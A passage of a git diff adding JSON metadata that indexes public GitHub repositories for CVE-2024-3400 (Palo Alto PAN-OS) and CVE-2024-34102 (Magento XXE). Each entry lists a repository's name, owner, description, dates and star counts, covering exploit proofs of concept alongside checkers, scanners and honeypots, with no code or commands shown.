[], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 786540183, + "name": "CVE-2024-3400", + "full_name": "MrR0b0t19\/CVE-2024-3400", + "owner": { + "login": "MrR0b0t19", + "id": 63489501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63489501?v=4", + "html_url": "https:\/\/github.com\/MrR0b0t19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrR0b0t19\/CVE-2024-3400", + "description": "Vulnerabilidad de palo alto ", + "fork": false, + "created_at": "2024-04-14T19:11:16Z", + "updated_at": "2024-04-15T20:17:12Z", + "pushed_at": "2024-04-14T19:23:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786651484, + "name": "CVE-2024-3400-Compromise-Checker", + "full_name": "MurrayR0123\/CVE-2024-3400-Compromise-Checker", + "owner": { + "login": "MurrayR0123", + "id": 98131196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98131196?v=4", + "html_url": "https:\/\/github.com\/MurrayR0123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MurrayR0123\/CVE-2024-3400-Compromise-Checker", + "description": "A simple bash script to check for evidence of compromise related to CVE-2024-3400", + "fork": false, + "created_at": "2024-04-15T03:28:22Z", + "updated_at": "2024-04-26T06:02:36Z", + "pushed_at": "2024-04-26T06:02:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 787153640, + "name": "CVE-2024-3400", + "full_name": "AdaniKamal\/CVE-2024-3400", + "owner": { + "login": "AdaniKamal", + "id": 44063862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44063862?v=4", + "html_url": "https:\/\/github.com\/AdaniKamal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdaniKamal\/CVE-2024-3400", + "description": "CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect", + "fork": false, + "created_at": "2024-04-16T01:43:24Z", + "updated_at": "2024-08-25T03:20:25Z", + "pushed_at": "2024-08-25T03:20:22Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787259719, + "name": "CVE-2024-3400-", + "full_name": "LoanVitor\/CVE-2024-3400-", + "owner": { + "login": "LoanVitor", + "id": 100142681, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100142681?v=4", + "html_url": "https:\/\/github.com\/LoanVitor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LoanVitor\/CVE-2024-3400-", + "description": null, + "fork": false, + "created_at": "2024-04-16T07:31:22Z", + "updated_at": "2024-04-16T17:18:12Z", + "pushed_at": "2024-04-16T07:41:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 787437309, + "name": "CVE-2024-3400", + "full_name": "h4x0r-dz\/CVE-2024-3400", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400", + "description": "CVE-2024-3400 Palo Alto OS Command Injection", + "fork": false, + "created_at": "2024-04-16T14:18:08Z", + "updated_at": "2025-01-04T13:34:10Z", + "pushed_at": "2024-04-16T22:35:43Z", + "stargazers_count": 151, + "watchers_count": 151, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 151, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787493956, + "name": "CVE-2024-3400-RCE-Scan", + "full_name": "W01fh4cker\/CVE-2024-3400-RCE-Scan", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-3400-RCE-Scan", + "description": "CVE-2024-3400-RCE", + "fork": false, + "created_at": "2024-04-16T16:18:56Z", + "updated_at": "2024-12-13T02:54:12Z", + "pushed_at": "2024-04-22T08:50:27Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 86, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 787515205, + "name": "CVE-2024-3400-POC", + "full_name": "CONDITIONBLACK\/CVE-2024-3400-POC", + "owner": { + "login": "CONDITIONBLACK", + "id": 6516181, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6516181?v=4", + "html_url": "https:\/\/github.com\/CONDITIONBLACK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CONDITIONBLACK\/CVE-2024-3400-POC", + "description": null, + "fork": false, + "created_at": "2024-04-16T17:08:15Z", + "updated_at": "2024-04-16T22:03:41Z", + "pushed_at": "2024-04-16T17:18:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 787613969, + "name": "CVE-2024-3400", + "full_name": "Chocapikk\/CVE-2024-3400", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-16T21:21:41Z", + "updated_at": "2024-12-19T15:21:51Z", + "pushed_at": "2024-04-17T21:04:22Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787614808, + "name": "CVE-2024-3400", + "full_name": "ihebski\/CVE-2024-3400", + "owner": { + "login": "ihebski", + "id": 13177580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13177580?v=4", + "html_url": "https:\/\/github.com\/ihebski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ihebski\/CVE-2024-3400", + "description": "CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect", + "fork": false, + "created_at": "2024-04-16T21:24:15Z", + "updated_at": "2025-01-07T23:28:39Z", + "pushed_at": "2024-04-17T11:03:32Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 787738421, + "name": "CVE-2024-3400-Checker", + "full_name": "index2014\/CVE-2024-3400-Checker", + "owner": { + "login": "index2014", + "id": 44129868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44129868?v=4", + "html_url": "https:\/\/github.com\/index2014", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/index2014\/CVE-2024-3400-Checker", + "description": "A check program for CVE-2024-3400, Palo Alto PAN-OS unauthenticated command injection vulnerability. Palo Alto 防火墙 PAN-OS 远程命令注入检测程序。", + "fork": false, + "created_at": "2024-04-17T04:58:42Z", + "updated_at": "2024-04-17T05:56:31Z", + "pushed_at": "2024-04-17T05:57:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787894337, + "name": "CVE-2024-3400-Canary", + "full_name": "ZephrFish\/CVE-2024-3400-Canary", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2024-3400-Canary", + "description": "Have we not learnt from HoneyPoC?", + "fork": false, + "created_at": "2024-04-17T11:41:01Z", + "updated_at": "2024-06-10T05:08:26Z", + "pushed_at": "2024-04-17T12:04:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 788013743, + "name": "CVE-2024-3400", + "full_name": "ak1t4\/CVE-2024-3400", + "owner": { + "login": "ak1t4", + "id": 10950567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10950567?v=4", + "html_url": "https:\/\/github.com\/ak1t4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ak1t4\/CVE-2024-3400", + "description": "Global Protec Palo Alto File Write Exploit", + "fork": false, + "created_at": "2024-04-17T16:01:20Z", + "updated_at": "2024-09-18T22:47:58Z", + "pushed_at": "2024-04-17T19:46:15Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788161583, + "name": "CVE-2024-3400", + "full_name": "retkoussa\/CVE-2024-3400", + "owner": { + "login": "retkoussa", + "id": 128074431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128074431?v=4", + "html_url": "https:\/\/github.com\/retkoussa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/retkoussa\/CVE-2024-3400", + "description": "CVE-2024-3400 : Palo Alto OS Command Injection - POC", + "fork": false, + "created_at": "2024-04-17T22:28:10Z", + "updated_at": "2024-11-12T13:55:11Z", + "pushed_at": "2024-04-17T23:46:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788388835, + "name": "CVE-2024-3400", + "full_name": "schooldropout1337\/CVE-2024-3400", + "owner": { + "login": "schooldropout1337", + "id": 134079876, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134079876?v=4", + "html_url": "https:\/\/github.com\/schooldropout1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/schooldropout1337\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-04-18T10:16:22Z", + "updated_at": "2024-10-22T07:09:25Z", + "pushed_at": "2024-04-22T05:06:51Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788514206, + "name": "CVE-2024-3400", + "full_name": "hahasagined\/CVE-2024-3400", + "owner": { + "login": "hahasagined", + "id": 3049408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3049408?v=4", + "html_url": "https:\/\/github.com\/hahasagined", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hahasagined\/CVE-2024-3400", + "description": "EDL for IPs attacking customers with CVE-2024-3400 ", + "fork": false, + "created_at": "2024-04-18T15:06:03Z", + "updated_at": "2024-04-18T15:06:03Z", + "pushed_at": "2024-04-18T15:13:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788553953, + "name": "CVE-2024-3400", + "full_name": "codeblueprint\/CVE-2024-3400", + "owner": { + "login": "codeblueprint", + "id": 212233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/212233?v=4", + "html_url": "https:\/\/github.com\/codeblueprint", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/codeblueprint\/CVE-2024-3400", + "description": "Simple Python code to check for arbitrary uploading for PaloAlto CVE-2024-3400", + "fork": false, + "created_at": "2024-04-18T16:35:29Z", + "updated_at": "2024-04-18T20:15:20Z", + "pushed_at": "2024-04-19T12:14:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788558935, + "name": "CVE-2024-3400", + "full_name": "swaybs\/CVE-2024-3400", + "owner": { + "login": "swaybs", + "id": 37590406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37590406?v=4", + "html_url": "https:\/\/github.com\/swaybs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swaybs\/CVE-2024-3400", + "description": "Python script to check Palo Alto firewalls for CVE-2024-3400 exploit attempts", + "fork": false, + "created_at": "2024-04-18T16:45:51Z", + "updated_at": "2024-08-02T15:51:45Z", + "pushed_at": "2024-04-18T18:06:13Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3400", + "palo-alto", + "palo-alto-firewalls", + "palo-alto-networks", + "paloaltonetworks", + "python", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788665827, + "name": "CVE-2024-3400-Check", + "full_name": "sxyrxyy\/CVE-2024-3400-Check", + "owner": { + "login": "sxyrxyy", + "id": 125439203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125439203?v=4", + "html_url": "https:\/\/github.com\/sxyrxyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxyrxyy\/CVE-2024-3400-Check", + "description": null, + "fork": false, + "created_at": "2024-04-18T21:12:49Z", + "updated_at": "2024-04-18T21:13:17Z", + "pushed_at": "2024-04-18T22:56:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788666276, + "name": "CVE-2024-3400", + "full_name": "Ravaan21\/CVE-2024-3400", + "owner": { + "login": "Ravaan21", + "id": 48627542, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48627542?v=4", + "html_url": "https:\/\/github.com\/Ravaan21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ravaan21\/CVE-2024-3400", + "description": "CVE-2024-3400 POC written in Rust and Python", + "fork": false, + "created_at": "2024-04-18T21:14:15Z", + "updated_at": "2024-04-18T21:16:31Z", + "pushed_at": "2024-04-18T21:21:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 788680382, + "name": "cve-2024-3400-poc", + "full_name": "tfrederick74656\/cve-2024-3400-poc", + "owner": { + "login": "tfrederick74656", + "id": 3392399, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3392399?v=4", + "html_url": "https:\/\/github.com\/tfrederick74656", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tfrederick74656\/cve-2024-3400-poc", + "description": "Simple POC for CVE-2024-3400", + "fork": false, + "created_at": "2024-04-18T22:01:16Z", + "updated_at": "2024-04-18T22:01:16Z", + "pushed_at": "2024-04-17T21:06:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 788820989, + "name": "CVE-2024-3400", + "full_name": "pwnj0hn\/CVE-2024-3400", + "owner": { + "login": "pwnj0hn", + "id": 29369899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29369899?v=4", + "html_url": "https:\/\/github.com\/pwnj0hn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwnj0hn\/CVE-2024-3400", + "description": "Finding Palo Alto devices vulnerable to CVE-2024-3400.", + "fork": false, + "created_at": "2024-04-19T06:37:32Z", + "updated_at": "2024-04-19T06:38:46Z", + "pushed_at": "2024-04-19T06:39:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789024043, + "name": "panrapidcheck", + "full_name": "HackingLZ\/panrapidcheck", + "owner": { + "login": "HackingLZ", + "id": 3459847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3459847?v=4", + "html_url": "https:\/\/github.com\/HackingLZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HackingLZ\/panrapidcheck", + "description": "Extract useful information from PANOS support file for CVE-2024-3400", + "fork": false, + "created_at": "2024-04-19T14:56:17Z", + "updated_at": "2024-04-20T08:23:35Z", + "pushed_at": "2024-04-19T20:06:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789741548, + "name": "cve-2024-3400", + "full_name": "Kr0ff\/cve-2024-3400", + "owner": { + "login": "Kr0ff", + "id": 35173514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35173514?v=4", + "html_url": "https:\/\/github.com\/Kr0ff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kr0ff\/cve-2024-3400", + "description": "Python exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation", + "fork": false, + "created_at": "2024-04-21T12:38:13Z", + "updated_at": "2024-04-21T12:41:00Z", + "pushed_at": "2024-04-21T12:40:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791330659, + "name": "CVE-2024-3400-pot", + "full_name": "zam89\/CVE-2024-3400-pot", + "owner": { + "login": "zam89", + "id": 3533227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3533227?v=4", + "html_url": "https:\/\/github.com\/zam89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zam89\/CVE-2024-3400-pot", + "description": "Simple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability", + "fork": false, + "created_at": "2024-04-24T14:21:26Z", + "updated_at": "2024-05-28T19:54:26Z", + "pushed_at": "2024-05-26T15:49:45Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-3400", + "flask", + "honeypot", + "python", + "python-3", + "python3" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791335435, + "name": "CVE-2024-3400-Checker", + "full_name": "terminalJunki3\/CVE-2024-3400-Checker", + "owner": { + "login": "terminalJunki3", + "id": 43526239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43526239?v=4", + "html_url": "https:\/\/github.com\/terminalJunki3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/terminalJunki3\/CVE-2024-3400-Checker", + "description": "Check to see if your Palo Alto firewall has been compromised by running script againt support bundle. ", + "fork": false, + "created_at": "2024-04-24T14:30:34Z", + "updated_at": "2024-04-25T13:15:04Z", + "pushed_at": "2024-04-25T13:15:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791764978, + "name": "CVE-2024-3400-Palo-Alto-OS-Command-Injection", + "full_name": "0xr2r\/CVE-2024-3400-Palo-Alto-OS-Command-Injection", + "owner": { + "login": "0xr2r", + "id": 72355033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72355033?v=4", + "html_url": "https:\/\/github.com\/0xr2r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xr2r\/CVE-2024-3400-Palo-Alto-OS-Command-Injection", + "description": null, + "fork": false, + "created_at": "2024-04-25T10:23:03Z", + "updated_at": "2024-06-13T04:13:12Z", + "pushed_at": "2024-04-25T11:49:04Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792861986, + "name": "CVE-2024-3400", + "full_name": "marconesler\/CVE-2024-3400", + "owner": { + "login": "marconesler", + "id": 168297747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168297747?v=4", + "html_url": "https:\/\/github.com\/marconesler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/marconesler\/CVE-2024-3400", + "description": "Exploit for GlobalProtect CVE-2024-3400", + "fork": false, + "created_at": "2024-04-27T18:58:41Z", + "updated_at": "2024-06-29T05:07:21Z", + "pushed_at": "2024-04-27T19:02:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 799662179, + "name": "CVE-2024-3400", + "full_name": "andrelia-hacks\/CVE-2024-3400", + "owner": { + "login": "andrelia-hacks", + "id": 110841971, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110841971?v=4", + "html_url": "https:\/\/github.com\/andrelia-hacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andrelia-hacks\/CVE-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-05-12T19:48:20Z", + "updated_at": "2024-05-12T19:48:35Z", + "pushed_at": "2024-05-12T19:48:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801106921, + "name": "IPLineFinder", + "full_name": "tk-sawada\/IPLineFinder", + "owner": { + "login": "tk-sawada", + "id": 130136436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130136436?v=4", + "html_url": "https:\/\/github.com\/tk-sawada", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tk-sawada\/IPLineFinder", + "description": "Find rows contain specific IP addresses in large files and then, extract them. This tool make for investigating logs for cve-2024-3400", + "fork": false, + "created_at": "2024-05-15T15:50:32Z", + "updated_at": "2024-05-20T01:41:26Z", + "pushed_at": "2024-05-20T01:41:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802848040, + "name": "cve-2024-3400", + "full_name": "iwallarm\/cve-2024-3400", + "owner": { + "login": "iwallarm", + "id": 146454845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146454845?v=4", + "html_url": "https:\/\/github.com\/iwallarm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iwallarm\/cve-2024-3400", + "description": null, + "fork": false, + "created_at": "2024-05-19T12:38:04Z", + "updated_at": "2024-05-23T19:11:53Z", + "pushed_at": "2024-05-23T19:11:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887034499, + "name": "CVE-2024-3400", + "full_name": "workshop748\/CVE-2024-3400", + "owner": { + "login": "workshop748", + "id": 101908212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101908212?v=4", + "html_url": "https:\/\/github.com\/workshop748", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/workshop748\/CVE-2024-3400", + "description": "Attempt at making the CVE-2024-3400 initial exploit (for educational purposes)", + "fork": false, + "created_at": "2024-11-12T03:46:39Z", + "updated_at": "2024-11-12T03:47:21Z", + "pushed_at": "2024-11-12T03:47:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896349076, + "name": "CVE-2024-3400", + "full_name": "nanwinata\/CVE-2024-3400", + "owner": { + "login": "nanwinata", + "id": 50732289, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50732289?v=4", + "html_url": "https:\/\/github.com\/nanwinata", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanwinata\/CVE-2024-3400", + "description": "CVE-2024-3400 PAN-OS Vulnerability Scanner.", + "fork": false, + "created_at": "2024-11-30T05:47:12Z", + "updated_at": "2024-11-30T05:48:45Z", + "pushed_at": "2024-11-30T05:48:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-34102.json b/2024/CVE-2024-34102.json new file mode 100644 index 0000000000..5f3a730b1e --- /dev/null +++ b/2024/CVE-2024-34102.json @@ -0,0 +1,717 @@ +[ + { + "id": 821028616, + "name": "TestCVE-2024-34102", + "full_name": "ArturArz1\/TestCVE-2024-34102", + "owner": { + "login": "ArturArz1", + "id": 174043872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174043872?v=4", + "html_url": "https:\/\/github.com\/ArturArz1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ArturArz1\/TestCVE-2024-34102", + "description": null, + "fork": false, + "created_at": "2024-06-27T16:59:29Z", + "updated_at": "2024-06-27T17:07:33Z", + "pushed_at": "2024-06-27T17:07:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821056402, + "name": "CVE-2024-34102", + "full_name": "th3gokul\/CVE-2024-34102", + "owner": { + "login": "th3gokul", + "id": 89386101, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89386101?v=4", + "html_url": "https:\/\/github.com\/th3gokul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th3gokul\/CVE-2024-34102", + "description": "CVE-2024-34102: Unauthenticated Magento XXE", + "fork": false, + "created_at": "2024-06-27T18:10:13Z", + "updated_at": "2024-11-17T22:47:14Z", + "pushed_at": "2024-08-14T15:10:47Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821130227, + "name": "CVE-2024-34102", + "full_name": "bigb0x\/CVE-2024-34102", + "owner": { + 